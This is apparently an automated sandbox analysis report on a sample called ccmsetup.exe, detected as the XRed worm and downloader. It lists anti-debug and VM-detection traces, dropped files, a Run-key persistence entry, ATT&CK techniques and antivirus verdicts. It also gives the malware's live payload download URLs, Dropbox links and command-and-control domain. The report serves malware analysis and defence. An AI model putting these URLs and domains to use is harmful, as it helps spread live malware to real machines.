                              Source: Amcache.hve.12.drBinary or memory string: VMware20,1
                              Source: Amcache.hve.12.drBinary or memory string: Microsoft Hyper-V Generation Counter
                              Source: Amcache.hve.12.drBinary or memory string: NECVMWar VMware SATA CD00
                              Source: Amcache.hve.12.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                              Source: Amcache.hve.12.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                              Source: Amcache.hve.12.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                              Source: Amcache.hve.12.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                              Source: Amcache.hve.12.drBinary or memory string: VMware PCI VMCI Bus Device
                              Source: Amcache.hve.12.drBinary or memory string: VMware VMCI Bus Device
                              Source: Synaptics.exe, 00000003.00000002.2909324806.000000000070B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWK
                              Source: Amcache.hve.12.drBinary or memory string: VMware Virtual RAM
                              Source: Amcache.hve.12.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                              Source: Amcache.hve.12.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: 2_2_005D0A72 IsDebuggerPresent,OutputDebugStringW,2_2_005D0A72
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: 2_2_005DCE62 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,2_2_005DCE62
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: 2_2_005B4BBD __EH_prolog3_catch_GS,LoadLibraryW,GetProcAddress,GetLastError,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,CoTaskMemFree,2_2_005B4BBD
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: 2_2_006158BF HeapCreate,HeapQueryInformation,HeapSetInformation,GetProcessHeap,2_2_006158BF
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: 2_2_005D57B7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_005D57B7
                              Source: C:\Users\user\Desktop\ccmsetup.exeProcess created: C:\Users\user\Desktop\._cache_ccmsetup.exe "C:\Users\user\Desktop\._cache_ccmsetup.exe" Jump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: 2_2_005B1B1C GetSecurityDescriptorDacl,_free,_malloc,InitializeAcl,IsValidAcl,SetSecurityDescriptorDacl,GetSecurityDescriptorSacl,_malloc,InitializeAcl,IsValidAcl,SetSecurityDescriptorSacl,GetSecurityDescriptorOwner,GetSecurityDescriptorGroup,GetSecurityDescriptorControl,SetSecurityDescriptorControl,GetLastError,_free,IsValidSecurityDescriptor,2_2_005B1B1C
                              Source: C:\Users\user\Desktop\ccmsetup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: 2_2_005F094C __EH_prolog3_catch_GS,GetCurrentThreadId,GetCurrentThread,GetThreadTimes,GetSystemTimeAsFileTime,GetCurrentThreadId,2_2_005F094C
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: 2_2_005F10F0 __EH_prolog3_catch_GS,GetLocalTime,GetTimeZoneInformation,_wcsrchr,GetCurrentThreadId,2_2_005F10F0
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: 2_2_005FBD05 __EH_prolog3_catch_GS,GetVersionExW,GetLastError,GetCurrentThreadId,GetModuleHandleW,GetProcAddress,GetLastError,GetCurrentThreadId,2_2_005FBD05
                              Source: Amcache.hve.12.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                              Source: Amcache.hve.12.drBinary or memory string: msmpeng.exe
                              Source: Amcache.hve.12.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                              Source: Amcache.hve.12.drBinary or memory string: MsMpEng.exe

                              Stealing of Sensitive Information

                              barindex
                              Yara detected XRed
                              Source: Yara matchFile source: ccmsetup.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.ccmsetup.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000003.00000003.2109250018.00000000006E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000000.2022900400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: ccmsetup.exe PID: 4512, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 2180, type: MEMORYSTR
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\RCXD7AF.tmp, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\Documents\BJZFPPWAPT\~$cache1, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED

                              Remote Access Functionality

                              barindex
                              Yara detected XRed
                              Source: Yara matchFile source: ccmsetup.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.ccmsetup.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000003.00000003.2109250018.00000000006E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000000.2022900400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: ccmsetup.exe PID: 4512, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 2180, type: MEMORYSTR
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\RCXD7AF.tmp, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\Documents\BJZFPPWAPT\~$cache1, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED

                              Mitre Att&ck Matrix

                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity Information41
                              Scripting                              		1
                              Replication Through Removable Media                              		3
                              Native API                              		41
                              Scripting                              		1
                              DLL Side-Loading                              		1
                              Deobfuscate/Decode Files or Information                              		OS Credential Dumping2
                              System Time Discovery                              		Remote Services1
                              Archive Collected Data                              		3
                              Ingress Tool Transfer                              		Exfiltration Over Other Network MediumAbuse Accessibility Features
                              CredentialsDomainsDefault Accounts2
                              Command and Scripting Interpreter                              		1
                              DLL Side-Loading                              		1
                              Access Token Manipulation                              		2
                              Obfuscated Files or Information                              		LSASS Memory1
                              Peripheral Device Discovery                              		Remote Desktop ProtocolData from Removable Media21
                              Encrypted Channel                              		Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain Accounts1
                              Scheduled Task/Job                              		14
                              Windows Service                              		14
                              Windows Service                              		1
                              Install Root Certificate                              		Security Account Manager4
                              File and Directory Discovery                              		SMB/Windows Admin SharesData from Network Shared Drive3
                              Non-Application Layer Protocol                              		Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal Accounts12
                              Service Execution                              		1
                              Scheduled Task/Job                              		11
                              Process Injection                              		1
                              DLL Side-Loading                              		NTDS15
                              System Information Discovery                              		Distributed Component Object ModelInput Capture34
                              Application Layer Protocol                              		Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchd1
                              Registry Run Keys / Startup Folder                              		1
                              Scheduled Task/Job                              		22
                              Masquerading                              		LSA Secrets1
                              Query Registry                              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                              Registry Run Keys / Startup Folder                              		31
                              Virtualization/Sandbox Evasion                              		Cached Domain Credentials151
                              Security Software Discovery                              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                              Access Token Manipulation                              		DCSync1
                              Process Discovery                              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                              Process Injection                              		Proc Filesystem31
                              Virtualization/Sandbox Evasion                              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                              System Network Configuration Discovery                              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                              Behavior Graph

                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1569604 Sample: ccmsetup.exe Startdate: 05/12/2024 Architecture: WINDOWS Score: 100 47 freedns.afraid.org 2->47 49 xred.mooo.com 2->49 51 4 other IPs or domains 2->51 65 Suricata IDS alerts for network traffic 2->65 67 Found malware configuration 2->67 69 Antivirus detection for URL or domain 2->69 73 13 other signatures 2->73 8 ccmsetup.exe 1 6 2->8         started        11 EXCEL.EXE 184 64 2->11         started        14 Synaptics.exe 2->14         started        signatures3 71 Uses dynamic DNS services 47->71 process4 dnsIp5 33 C:\Users\user\Desktop\._cache_ccmsetup.exe, PE32 8->33 dropped 35 C:\ProgramData\Synaptics\Synaptics.exe, PE32 8->35 dropped 37 C:\ProgramData\Synaptics\RCXD7AF.tmp, PE32 8->37 dropped 39 C:\...\Synaptics.exe:Zone.Identifier, ASCII 8->39 dropped 16 Synaptics.exe 116 8->16         started        21 ._cache_ccmsetup.exe 4 8->21         started        53 s-part-0035.t-0009.t-msedge.net 13.107.246.63, 443, 49745, 49749 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 11->53 file6 process7 dnsIp8 41 drive.usercontent.google.com 142.250.181.129, 443, 49718, 49719 GOOGLEUS United States 16->41 43 docs.google.com 172.217.19.238, 443, 49707, 49708 GOOGLEUS United States 16->43 45 freedns.afraid.org 69.42.215.252, 49712, 80 AWKNET-LLCUS United States 16->45 31 C:\Users\user\Documents\BJZFPPWAPT\~$cache1, PE32 16->31 dropped 55 Antivirus detection for dropped file 16->55 57 Multi AV Scanner detection for dropped file 16->57 59 Drops PE files to the document folder of the user 16->59 61 Machine Learning detection for dropped file 16->61 23 WerFault.exe 22 16 16->23         started        25 WerFault.exe 16->25         started        27 WerFault.exe 16->27         started        29 3 other processes 16->29 63 Registers a new ROOT certificate 21->63 file9 signatures10 process11

                              Screenshots

                              Thumbnails

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand

                              Antivirus, Machine Learning and Genetic Malware Detection

                              Initial Sample

                              SourceDetectionScannerLabelLink
                              ccmsetup.exe92%ReversingLabsWin32.Worm.Zorex
                              ccmsetup.exe100%AviraTR/Dldr.Agent.SH
                              ccmsetup.exe100%AviraW2000M/Dldr.Agent.17651006
                              ccmsetup.exe100%Joe Sandbox ML

                              Dropped Files

                              SourceDetectionScannerLabelLink
                              C:\ProgramData\Synaptics\RCXD7AF.tmp100%AviraTR/Dldr.Agent.SH
                              C:\ProgramData\Synaptics\RCXD7AF.tmp100%AviraW2000M/Dldr.Agent.17651006
                              C:\ProgramData\Synaptics\Synaptics.exe100%AviraTR/Dldr.Agent.SH
                              C:\ProgramData\Synaptics\Synaptics.exe100%AviraW2000M/Dldr.Agent.17651006
                              C:\Users\user\Documents\BJZFPPWAPT\~$cache1100%AviraTR/Dldr.Agent.SH
                              C:\Users\user\Documents\BJZFPPWAPT\~$cache1100%AviraW2000M/Dldr.Agent.17651006
                              C:\ProgramData\Synaptics\RCXD7AF.tmp100%Joe Sandbox ML
                              C:\ProgramData\Synaptics\Synaptics.exe100%Joe Sandbox ML
                              C:\Users\user\Documents\BJZFPPWAPT\~$cache1100%Joe Sandbox ML
                              C:\ProgramData\Synaptics\RCXD7AF.tmp92%ReversingLabsWin32.Worm.Zorex
                              C:\ProgramData\Synaptics\Synaptics.exe92%ReversingLabsWin32.Worm.Zorex
                              C:\Users\user\Desktop\._cache_ccmsetup.exe0%ReversingLabs
                              C:\Users\user\Documents\BJZFPPWAPT\~$cache192%ReversingLabsWin32.Worm.Zorex

                              Unpacked PE Files

                              No Antivirus matches

                              Domains

                              No Antivirus matches

                              URLs

                              SourceDetectionScannerLabelLink
                              http://%s/%s/.sms_aut?SITESIGNCERT0%Avira URL Cloudsafe
                              http://%s/SMS_MP/.sms_aut?SMSTRC0%Avira URL Cloudsafe
                              http://xred.site50.net/syn/Synaptics.rarZ100%Avira URL Cloudmalware
                              http://xred.site50.net/syn/SSLLibrary.dll6100%Avira URL Cloudmalware
                              http://%s/SMS_MP/.sms_aut?SMSTRC..0%Avira URL Cloudsafe
                              http://xred.site50.net/syn/SUpdate.iniZ100%Avira URL Cloudmalware

                              Domains and IPs

                              Contacted Domains

                              NameIPActiveMaliciousAntivirus DetectionReputation
                              freedns.afraid.org
                              		69.42.215.252
                              		truefalse
                                		high
                                docs.google.com
                                		172.217.19.238
                                		truefalse
                                  		high
                                  drive.usercontent.google.com
                                  		142.250.181.129
                                  		truefalse
                                    		high
                                    s-part-0035.t-0009.t-msedge.net
                                    		13.107.246.63
                                    		truefalse
                                      		high
                                      xred.mooo.com
                                      		unknown
                                      		unknownfalse
                                        		high

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        xred.mooo.comfalse
                                          		high
                                          http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978false
                                            		high

                                            URLs from Memory and Binaries

                                            NameSourceMaliciousAntivirus DetectionReputation
                                            https://login.windows.net/common._cache_ccmsetup.exefalse
                                              		high
                                              https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=ccmsetup.exe, 00000000.00000003.2037127385.0000000002600000.00000004.00001000.00020000.00000000.sdmpfalse
                                                		high
                                                https://login.windows.net._cache_ccmsetup.exefalse
                                                  		high
                                                  http://xred.site50.net/syn/Synaptics.rarZSynaptics.exe, 00000003.00000002.2912509915.00000000021B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1~$cache1.3.drfalse
                                                    		high
                                                    https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:Synaptics.exe, 00000003.00000002.2912509915.00000000021B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978RSynaptics.exe, 00000003.00000002.2909324806.00000000006C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://drive.usercontent.google.com/Synaptics.exe, Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://upx.sf.netAmcache.hve.12.drfalse
                                                            		high
                                                            http://xred.site50.net/syn/Synaptics.rar~$cache1.3.drfalse
                                                              		high
                                                              https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlPccmsetup.exe, 00000000.00000003.2037127385.0000000002600000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://docs.google.com/eSynaptics.exe, 00000003.00000002.3045067074.000000001D9E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://%s/SMS_MP/.sms_aut?SMSTRC..ccmsetup.exe, ._cache_ccmsetup.exe.0.dr, Synaptics.exe.0.drfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://docs.google.com/Synaptics.exe, 00000003.00000003.2152405545.0000000000728000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001D9E9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.00000000006C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://%s/SMS_MP/.sms_aut?SMSTRC._cache_ccmsetup.exefalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://xred.site50.net/syn/SSLLibrary.dlccmsetup.exe, 00000000.00000003.2037127385.0000000002600000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://xred.site50.net/syn/SSLLibrary.dll6Synaptics.exe, 00000003.00000002.2912509915.00000000021B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:Synaptics.exe, 00000003.00000002.2912509915.00000000021B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://login.microsoftonline.com/common/oauth2/token._cache_ccmsetup.exefalse
                                                                          		high
                                                                          https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1~$cache1.3.drfalse
                                                                            		high
                                                                            https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1~$cache1.3.drfalse
                                                                              		high
                                                                              http://xred.site50.net/syn/SUpdate.iniZSynaptics.exe, 00000003.00000002.2912509915.00000000021B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: malware
                                                                              		unknown
                                                                              http://xred.site50.net/syn/SUpdate.ini~$cache1.3.drfalse
                                                                                		high
                                                                                http://%s/%s/.sms_aut?SITESIGNCERT._cache_ccmsetup.exefalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978pccmsetup.exe, 00000000.00000003.2037127385.0000000002600000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16Synaptics.exe, 00000003.00000002.2912509915.00000000021B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://docs.google.com/uc?id=0;Synaptics.exe, 00000003.00000002.3004223452.000000000DC3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3017129835.00000000105BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3060328812.000000002633E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3032972975.00000000185FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3029759770.0000000015CBE000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://xred.site50.net/syn/SSLLibrary.dll~$cache1.3.drfalse
                                                                                        		high

                                                                                        World Map of Contacted IPs

                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs

                                                                                        Public IPs

                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        172.217.19.238
                                                                                        		docs.google.comUnited States
                                                                                        		15169GOOGLEUSfalse
                                                                                        13.107.246.63
                                                                                        		s-part-0035.t-0009.t-msedge.netUnited States
                                                                                        		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                        142.250.181.129
                                                                                        		drive.usercontent.google.comUnited States
                                                                                        		15169GOOGLEUSfalse
                                                                                        69.42.215.252
                                                                                        		freedns.afraid.orgUnited States
                                                                                        		17048AWKNET-LLCUSfalse

                                                                                        General Information

                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                        Analysis ID:1569604
                                                                                        Start date and time:2024-12-05 22:49:08 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 7m 8s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:40
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:ccmsetup.exe
                                                                                        Detection:MAL
                                                                                        Classification:mal100.bank.troj.expl.evad.winEXE@13/33@11/4
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 50%
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 87%
                                                                                        • Number of executed functions: 103
                                                                                        • Number of non-executed functions: 184
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .exe

                                                                                        Warnings

                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                        • Excluded IPs from analysis (whitelisted): 52.109.32.97, 52.113.194.132, 20.189.173.5, 52.182.143.212
                                                                                        • Excluded domains from analysis (whitelisted): onedscolprdwus04.westus.cloudapp.azure.com, slscr.update.microsoft.com, otelrules.afd.azureedge.net, ecs-office.s-0005.s-msedge.net, ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, officeclient.microsoft.com, ukw-azsc-config.officeapps.live.com, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, s-0005.s-msedge.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, ecs.office.trafficmanager.net, europe.configsvc1.live.com.akadns.net
                                                                                        • Execution Graph export aborted for target Synaptics.exe, PID 2180 because there are no executed function
                                                                                        • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                        • VT rate limit hit for: ccmsetup.exe

                                                                                        Simulations

                                                                                        Behavior and APIs

                                                                                        TimeTypeDescription
                                                                                        16:50:05API Interceptor446x Sleep call for process: Synaptics.exe modified
                                                                                        16:51:03API Interceptor3x Sleep call for process: WerFault.exe modified
                                                                                        22:50:02AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe

                                                                                        Joe Sandbox View / Context

                                                                                        IPs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        13.107.246.63Contract Proposal Documents.pdfGet hashmaliciousUnknownBrowse
                                                                                        • assets-gbr.mkt.dynamics.com/cc57758b-ada1-ef11-8a64-000d3a872ba0/digitalassets/standaloneforms/645a21a8-32ac-ef11-b8e8-6045bd0f229c
                                                                                        69.42.215.252Synaptics.exeGet hashmaliciousXRedBrowse
                                                                                        • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                        RezQY7jWu8.exeGet hashmaliciousXRedBrowse
                                                                                        • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                        Dzsb.Qyd.Install.exeGet hashmaliciousXRedBrowse
                                                                                        • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                        Bank Information Details.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                        • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                        System Volume Information.exeGet hashmaliciousXRedBrowse
                                                                                        • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                        P4.exeGet hashmaliciousXRedBrowse
                                                                                        • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                        Supplier RFQ ID 365242213q___________________________pdf.exeGet hashmaliciousSnake Keylogger, XRedBrowse
                                                                                        • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                        Synaptics.exeGet hashmaliciousXRedBrowse
                                                                                        • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                        C5Nbn7P6GJ.exeGet hashmaliciousXRed, XWormBrowse
                                                                                        • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                        lFsYXvJPWw.exeGet hashmaliciousXRedBrowse
                                                                                        • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

                                                                                        Domains

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        s-part-0035.t-0009.t-msedge.nethttps://www.freelancer.com/users/login-quick.php?token=02fff9bf9f8b7efe683f539f10a258726ae01239eb8f0b9b57526578d393fc63&url=https%3A%2F%2Fwww.google.com.bn%2Furl%3Ffnc%3Da9XTEoexMBpyPYn99soX%26ndp%3Dm6lKEDZMuBIQeZn7RBkX%26sa%3Dt%26pfuv%3DBY2IJKbokHGBEdfDSRyz%26ncbe%3DtA02sXUJ4dkStFSKl5Bg%26db%3DoBemf3zEg5VOxgJRxd3H%26fg%3DSSndprYXntqQtLjEHziw%26url%3Damp%252Ffileshareinfoviewnow.s3-website.us-east-2.amazonaws.com&user_id=1719536768&uniqid=76018695-412152-662ef280-88c3b518&linkid=6Get hashmaliciousUnknownBrowse
                                                                                        • 13.107.246.63
                                                                                        https://assets-gbr.mkt.dynamics.com/cc57758b-ada1-ef11-8a64-000d3a872ba0/digitalassets/standaloneforms/7608c709-85a2-ef11-8a69-7c1e5279b2ddGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                                        • 13.107.246.63
                                                                                        https://url.us.m.mimecastprotect.com/s/tWC_CNkXmJcoqkvlsmfBIyQP6j?domain=assets-gbr.mkt.dynamics.comGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                                        • 13.107.246.63
                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 13.107.246.63
                                                                                        file.exeGet hashmaliciousStealcBrowse
                                                                                        • 13.107.246.63
                                                                                        re.exeGet hashmaliciousNeshtaBrowse
                                                                                        • 13.107.246.63
                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 13.107.246.63
                                                                                        file.exeGet hashmaliciousStealcBrowse
                                                                                        • 13.107.246.63
                                                                                        Lab 9_exe.exeGet hashmaliciousUnknownBrowse
                                                                                        • 13.107.246.63
                                                                                        Synaptics.exeGet hashmaliciousXRedBrowse
                                                                                        • 13.107.246.63
                                                                                        freedns.afraid.orgSynaptics.exeGet hashmaliciousXRedBrowse
                                                                                        • 69.42.215.252
                                                                                        RezQY7jWu8.exeGet hashmaliciousXRedBrowse
                                                                                        • 69.42.215.252
